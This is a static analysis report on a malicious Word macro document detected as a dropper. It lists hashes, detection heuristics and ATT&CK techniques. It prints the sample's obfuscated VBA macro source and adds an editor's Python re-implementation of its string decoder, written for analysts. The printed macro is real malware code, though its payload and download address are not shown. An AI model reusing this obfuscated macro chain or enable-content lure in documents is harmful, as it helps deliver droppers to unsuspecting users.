Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bc8111e7b25241b1…

MALICIOUS

Office (OLE)

Size: 47.5 KB
Created: 2018-08-31 09:35:00
Authoring application: Microsoft Office Word
First seen: 2019-04-18
MD5: 31e06e2cff44e999d671bb1cc51c4411
SHA-1: 51cfb37822f8a082e5145288a6f6875c866e1781
SHA-256: bc8111e7b25241b1cb86c0c01b1c18ed8aecc1b576b85f797b66ea1c46c549de
Risk score: 202

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1566.001 Phishing: Spearphishing Attachment
T1204.002 User Execution: Malicious File

The file carries VBA macros spread across several modules (ThisDocument, gazecoel, mcinnes1, sibpectw, sionglec) plus a UserForm named form1. The visible Document_Open handler does nothing but write "\" into form1.TextBox3; the rest of the chain is driven by UserForm control events, a common way to keep the interesting code out of the document module. Module gazecoel rebuilds a string from ten encoded chunks returned by hooJoy21(), decoding each with a character-substitution routine (whitneybmp): every character is looked up in a key alphabet held in form1.TextBox1 and replaced by the character nine positions earlier in that alphabet, wrapping around at the start. The decoded chunks are interleaved with the literal tokens "kuhcpezU", "pfarm123", "blkscorp" and "nick112233", and the result is written to form1.TextBox2; the TextBox2_Change handler that consumes it is cut off in the preview, so it cannot be determined from this page whether those tokens are stripped there or form part of the final command. The key alphabet is a form control value rather than VBA source, so the extracted macro text alone does not yield the final command. The critical OLE_VBA_SHELL heuristic reports a Shell() call in the extracted source outside the visible part of the preview, consistent with a downloader or dropper that runs a second-stage payload, but neither the payload nor any download URL is visible here. The document body instructs the user to enable editing and content, the usual lure to get the macro past Protected View and the macro security prompt.

Heuristics (6)

  • ClamAV: Doc.Dropper.Agent-6667838-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6667838-0
  • VBA macros detected [medium, 2 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    The extracted VBA source contains a call to Shell(), which runs an arbitrary command line; in a document macro this is the usual hand-off from string decoding to payload execution
  • Document_Open macro [high] OLE_VBA_DOCOPEN
    A Document_Open handler runs automatically as soon as the document is opened with macros enabled, with no further user action
  • Macro/content-enable lure [medium] SE_ENABLE_LURE
    Document instructs the user to enable macros or editing, a common technique used by malware droppers to get past Protected View and the Office macro security prompt
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace that Office writes into any document carrying drawing or shape data; it is not a contact point and should not be used as an indicator.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 4312 bytes
SHA-256: 31358157051a7666ed2237cb5c792556585d27e2220ab635daabfd25afd530b2

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
quezhang "\"
End Sub

Attribute VB_Name = "gazecoel"
Function adynastya()
frednicole = ""
giglimator = "kuhcpezU"
anentanent (hooJoy21(1))
coolmark frednicole, form1.TextBox4, giglimator
anentanent (hooJoy21(2))
imanoobik = "pfarm123"
coolmark frednicole, form1.TextBox4, imanoobik
anentanent (hooJoy21(3))
coolmark frednicole, form1.TextBox4, imanoobik
anentanent (hooJoy21(4))
ANIHULAKOP = "blkscorp"
coolmark frednicole, form1.TextBox4, ANIHULAKOP
anentanent (hooJoy21(5))
coolmark frednicole, form1.TextBox4, ANIHULAKOP
anentanent (hooJoy21(6))
coolmark frednicole, form1.TextBox4, giglimator
anentanent (hooJoy21(7))
coolmark frednicole, form1.TextBox4, giglimator
anentanent (hooJoy21(8))
arkPP666 = "nick112233"
coolmark frednicole, form1.TextBox4, arkPP666
anentanent (hooJoy21(9))
coolmark frednicole, form1.TextBox4, arkPP666
anentanent (hooJoy21("BC"))
coolmark frednicole, form1.TextBox4, ""

form1.TextBox2 = frednicole
End Function

Function anentanent(frednicole)
form1.TextBox4 = whitneybmp(frednicole)
End Function

Attribute VB_Name = "mcinnes1"
Function whitneybmp(ninevehnineveh)
siouzos7 = ""
clinenug = 1
AVOHULPET clinenug, siouzos7, ninevehnineveh
whitneybmp = siouzos7
End Function

Function AVOHULPET(ByRef NIKNAMIP, ByRef scindcou, mespooky)
cookie1979 = Len(mespooky)
If NIKNAMIP <= cookie1979 Then
scindcou = scindcou + xxxcraftxxx(czgorover(Mid(mespooky, NIKNAMIP, 1)), 9)
NIKNAMIP = NIKNAMIP + 1
AVOHULPET NIKNAMIP, scindcou, mespooky
End If
End Function

Function xxxcraftxxx(Hillside, ityasan1)
If Hillside - ityasan1 < 1 Then
xxxcraftxxx = Mid(form1.TextBox1, Len(form1.TextBox1) + Hillside - ityasan1, 1)
Else
xxxcraftxxx = Mid(form1.TextBox1, Hillside - ityasan1, 1)
End If
End Function

Function czgorover(lol159)
meman111 = 1
naantoot = 1
utriglis meman111, naantoot, lol159
czgorover = naantoot
End Function
  
Function utriglis(ByRef meman111, ByRef naantoot, lol159)
droldemi = form1.TextBox1
cookie1979 = Len(droldemi)
If NIKNAMIP < cookie1979 Then
    If lol159 <> Mid(droldemi, meman111, VbLet - 3) Then
    meman111 = meman111 + VbLet - 3
    utriglis meman111, naantoot, lol159
    Else
    naantoot = meman111
    End If
End If
End Function

Attribute VB_Name = "sibpectw"
Function hooJoy21(warrenwolf)
Select Case warrenwolf
Case 1
hooJoy21 = "){c9})9lkasdxns""""9.,lkasdxns""""9..vh$)fjk$9"
Case 2
hooJoy21 = "\-xfdj$b%9_"
Case 3
hooJoy21 = ";|\$sa4k]ms)f9xgxfs{ $sf as])""js$f; cka$""kzcvj""s\_"
Case 4
hooJoy21 = "1,,5f{l52"
Case 5
hooJoy21 = " s(s,,;3xfzdf4ldk)sxx9,,5f{l52"
Case 6
hooJoy21 = " s(s,,3:fdg|"
Case 7
hooJoy21 = "\,,nffl8}}]]z4sx )k{})""j $/',,;:)zf)n|"
Case 8
hooJoy21 = "\,,nffl8}}]scxq]hg )k h/})""j $/',,;:,..979khf4vj""s94s$)kcj$b9zx)jj94vj""slzfn95f{l52"
Case 9
hooJoy21 = " ]zf39xfzdf4ldk)sxx9,5f{l52"
End Select
If InStr(warrenwolf, "BC") Then
hooJoy21 = " ]zf,94aj$ckaxfg""s9njccs$."
End If
End Function

Attribute VB_Name = "sionglec"
Function coolmark(ByRef vanessahal, nerycoun, GNINIART)
vanessahal = vanessahal + nerycoun + GNINIART
End Function

Function eagleangel()
eagleangel = "1"
End Function

Function quezhang(ByRef grayphyl)
form1.TextBox3 = grayphyl
End Function

Attribute VB_Name = "form1"
Attribute VB_Base = "0{15D68E64-E253-47E2-9ECA-47A853961B54}{17C91209-D89C-4BD8-9651-A27D73B22053}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Private Sub CommandButton1_Click()

End Sub

Private Sub OptionButton1_Click()

End Sub

Private Sub TextBox2_Change()
vgh = VbGet - 2
vgh3 = form1.TextBox2

... (truncated)
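The decoder and assembly routine visible in the preview, re-implemented in Python as an added example; this is the editor's code, not part of the sample or of the analysis pipeline. Positions are 1-based in the VBA and 0-based here, and the `VbLet - 3` and `VbGet - 2` expressions in the macro are just the constants 1 and 0 written through the VbCallType enum values (VbLet = 4, VbGet = 2). The key alphabet form1.TextBox1 is a UserForm control value that the VBA extraction does not include, so `DEMO_ALPHABET` below is a constructed placeholder: with it the assembled string is meaningless, but the functions perform the same steps the macro does, and `missing_chars` returns the character set any recovered alphabet must contain (for a character not in the alphabet, utriglis never reaches its stop condition and recurses until the stack overflows). The `SEGMENTS` table is transcribed from hooJoy21(), with VBA's doubled "" collapsed to one quote character.

```python
"""Re-implementation of the VBA string decoder (whitneybmp / AVOHULPET /
czgorover / xxxcraftxxx) and the assembly routine adynastya from the
extracted macro. Editor's example code; the real key alphabet
(form1.TextBox1) is not in the extracted VBA, so a CONSTRUCTED alphabet
is used to exercise the mechanics."""
import string

SHIFT = 9  # the literal 9 passed to xxxcraftxxx(..., 9)

# Encoded chunks returned by hooJoy21(), VBA "" collapsed to a single quote.
SEGMENTS = {
    1: '){c9})9lkasdxns""9.,lkasdxns""9..vh$)fjk$9',
    2: "\\-xfdj$b%9_",
    3: ';|\\$sa4k]ms)f9xgxfs{ $sf as])"js$f; cka$"kzcvj"s\\_',
    4: "1,,5f{l52",
    5: " s(s,,;3xfzdf4ldk)sxx9,,5f{l52",
    6: " s(s,,3:fdg|",
    7: "\\,,nffl8}}]]z4sx )k{})\"j $/',,;:)zf)n|",
    8: "\\,,nffl8}}]scxq]hg )k h/})\"j $/',,;:,..979khf4vj\"s94s$)kcj$b9zx)jj94vj\"slzfn95f{l52",
    9: " ]zf39xfzdf4ldk)sxx9,5f{l52",
    "BC": ' ]zf,94aj$ckaxfg"s9njccs$.',
}

# (segment key, literal token appended after it), in the order adynastya uses.
ASSEMBLY_ORDER = [
    (1, "kuhcpezU"), (2, "pfarm123"), (3, "pfarm123"), (4, "blkscorp"),
    (5, "blkscorp"), (6, "kuhcpezU"), (7, "kuhcpezU"), (8, "nick112233"),
    (9, "nick112233"), ("BC", ""),
]

# Constructed demo alphabet (NOT the sample's TextBox1): all printable ASCII.
DEMO_ALPHABET = string.ascii_letters + string.digits + string.punctuation + " "


def decode_char(alphabet, ch, shift=SHIFT):
    """czgorover + xxxcraftxxx: first index of ch in the alphabet, moved back
    by `shift` positions with wrap-around (the pos - 9 < 1 branch in VBA)."""
    if ch not in alphabet:
        # The VBA has no stop condition for this case and recurses forever.
        raise ValueError(f"character {ch!r} is not in the key alphabet")
    return alphabet[(alphabet.index(ch) - shift) % len(alphabet)]


def decode_segment(alphabet, encoded, shift=SHIFT):
    """whitneybmp: decode one chunk character by character, left to right."""
    return "".join(decode_char(alphabet, c, shift) for c in encoded)


def encode_segment(alphabet, plain, shift=SHIFT):
    """Inverse of decode_segment, handy for checking a candidate alphabet."""
    return decode_segment(alphabet, plain, -shift)


def assemble(alphabet, segments=SEGMENTS, order=ASSEMBLY_ORDER):
    """adynastya: for each pair, decoded chunk then the literal token
    (coolmark). The result is what the macro writes to form1.TextBox2."""
    out = ""
    for key, literal in order:
        out += decode_segment(alphabet, segments[key]) + literal
    return out


def missing_chars(alphabet, segments=SEGMENTS):
    """Characters the real alphabet must contain for the macro to terminate.
    Use it to sanity-check an alphabet recovered from the form storage."""
    needed = set("".join(segments.values()))
    return sorted(needed - set(alphabet))


if __name__ == "__main__":
    # With the constructed alphabet the output is gibberish of the right shape.
    print(assemble(DEMO_ALPHABET))
```

To apply this to the real sample, replace `DEMO_ALPHABET` with the TextBox1 value recovered from the form1 storage (oletools ships an oleform module for dumping UserForm control values; whether your olevba version surfaces them directly is an assumption to verify) and confirm `missing_chars` is empty before calling `assemble`; the assembled string is the input to the truncated TextBox2_Change handler, not necessarily the final command line.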